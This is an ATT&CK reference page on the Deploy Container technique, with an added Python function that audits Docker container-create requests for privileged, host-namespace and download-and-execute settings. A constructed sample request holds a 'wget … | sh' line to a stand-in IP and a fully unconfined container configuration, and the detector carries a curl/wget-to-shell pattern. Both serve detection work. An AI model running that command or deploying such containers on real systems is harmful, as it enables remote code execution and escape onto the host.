T1610: Deploy Container

Platforms: Containers

ATT&CK version: 14.1

What it is

Adversaries may deploy a container into an environment to facilitate execution or to evade defenses. In some cases an adversary deploys a new container to run the processes associated with a particular image or deployment, such as processes that execute or download malware. In others, the adversary deploys a container configured without network rules, user limitations, or similar controls, so that it runs outside the defenses applied to the rest of the environment. Containers can be deployed by various means, for example through the Docker Engine API's container create and start endpoints [3], or through a web application such as the Kubernetes dashboard [5] or Kubeflow [4]. The image itself may be malicious, whether retrieved or built by the adversary, or it may be a benign image whose command downloads and executes a malicious payload at runtime [2].
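The two variants above (a hostile image, or a benign image whose command pulls a payload at runtime, in either case often launched with the usual guardrails removed) are both visible in the container-create request itself. The following is an added example, not code from the ATT&CK page or from MITRE: a small audit function over the JSON body of a Docker Engine `POST /containers/create` request. The field names (Image, Cmd, User, HostConfig.Privileged, HostConfig.NetworkMode, HostConfig.Binds, and so on) are the real Docker API fields; the two request bodies and the IP address in them are constructed for the example, and the set of flagged settings is this example's own choice rather than a list the page provides.

```python
"""Audit a Docker `POST /containers/create` request body for settings that
match the Deploy Container technique. Added example; the sample bodies below
are constructed, not captured from a real incident."""
import json
import re
from typing import Any

# Constructed sample: a benign base image whose command downloads and runs a
# payload at runtime, started privileged with host namespaces and the host
# root filesystem mounted. 203.0.113.10 is a documentation-range address.
SUSPICIOUS_CREATE_BODY = json.dumps({
    "Image": "alpine:3.19",
    "User": "",
    "Cmd": ["sh", "-c", "wget -qO- http://203.0.113.10/x.sh | sh"],
    "HostConfig": {
        "Privileged": True,
        "NetworkMode": "host",
        "PidMode": "host",
        "Binds": ["/:/host:rw"],
        "CapAdd": ["SYS_ADMIN"],
        "SecurityOpt": ["apparmor=unconfined", "seccomp=unconfined"],
    },
})

# Constructed sample: a typical, constrained deployment that should not alert.
BENIGN_CREATE_BODY = json.dumps({
    "Image": "nginx:1.25",
    "User": "101:101",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {
        "NetworkMode": "bridge",
        "Binds": ["/srv/www:/usr/share/nginx/html:ro"],
        "CapDrop": ["ALL"],
    },
})

# Download-and-execute shape used by "benign image, malicious runtime" deployments.
_DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def _as_list(value: Any) -> list[str]:
    """Cmd and Entrypoint may be a string or a list in the Docker API."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def audit_create_request(body: str) -> list[str]:
    """Return human-readable findings for one container-create request body."""
    cfg: dict[str, Any] = json.loads(body)
    host: dict[str, Any] = cfg.get("HostConfig") or {}
    findings: list[str] = []

    if host.get("Privileged"):
        findings.append("privileged container")
    for key, label in (("NetworkMode", "network"), ("PidMode", "pid"), ("IpcMode", "ipc")):
        if host.get(key) == "host":
            findings.append(f"host {label} namespace")
    for bind in host.get("Binds") or []:
        src = bind.split(":", 1)[0]
        # The host root or the Docker socket gives the container the host.
        if src == "/" or src == "/var/run/docker.sock":
            findings.append(f"sensitive host path mounted: {src}")
    cap_add = host.get("CapAdd") or []
    if "SYS_ADMIN" in cap_add or "ALL" in cap_add:
        findings.append("dangerous capability added")
    for opt in host.get("SecurityOpt") or []:
        if opt.endswith("unconfined"):
            findings.append(f"security profile disabled: {opt}")
    if not cfg.get("User"):
        findings.append("runs as root (no User set)")
    cmdline = " ".join(_as_list(cfg.get("Entrypoint")) + _as_list(cfg.get("Cmd")))
    if _DOWNLOAD_EXEC.search(cmdline):
        findings.append("command downloads and executes remote content")
    return findings


if __name__ == "__main__":
    for name, body in (("suspicious", SUSPICIOUS_CREATE_BODY), ("benign", BENIGN_CREATE_BODY)):
        print(f"{name}: {audit_create_request(body) or 'no findings'}")
```

The same fields appear, under different spellings, in `docker run` flags and in a Kubernetes pod spec (securityContext.privileged, hostNetwork, hostPID, hostPath volumes), so the check ports to an admission controller or to audit-log review of dashboard and pipeline deployments with the field names swapped.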

ATT&CK tactics (2)

Defense Evasion, Execution

References

  1. MITRE ATT&CK, T1610 Deploy Container: https://attack.mitre.org/techniques/T1610
  2. Aqua Security, malicious container images and host access: https://blog.aquasec.com/malicious-container-image-docker-container-host
  3. Docker Engine API v1.41, Container endpoints: https://docs.docker.com/engine/api/v1.41/#tag/Container
  4. Kubeflow Pipelines overview: https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/
  5. Kubernetes Dashboard (web UI): https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/

Sourced from MITRE ATT&CK Enterprise v14.1. Curated and contextualized for EU compliance use cases by Adam Lundqvist, Founder at SQUR.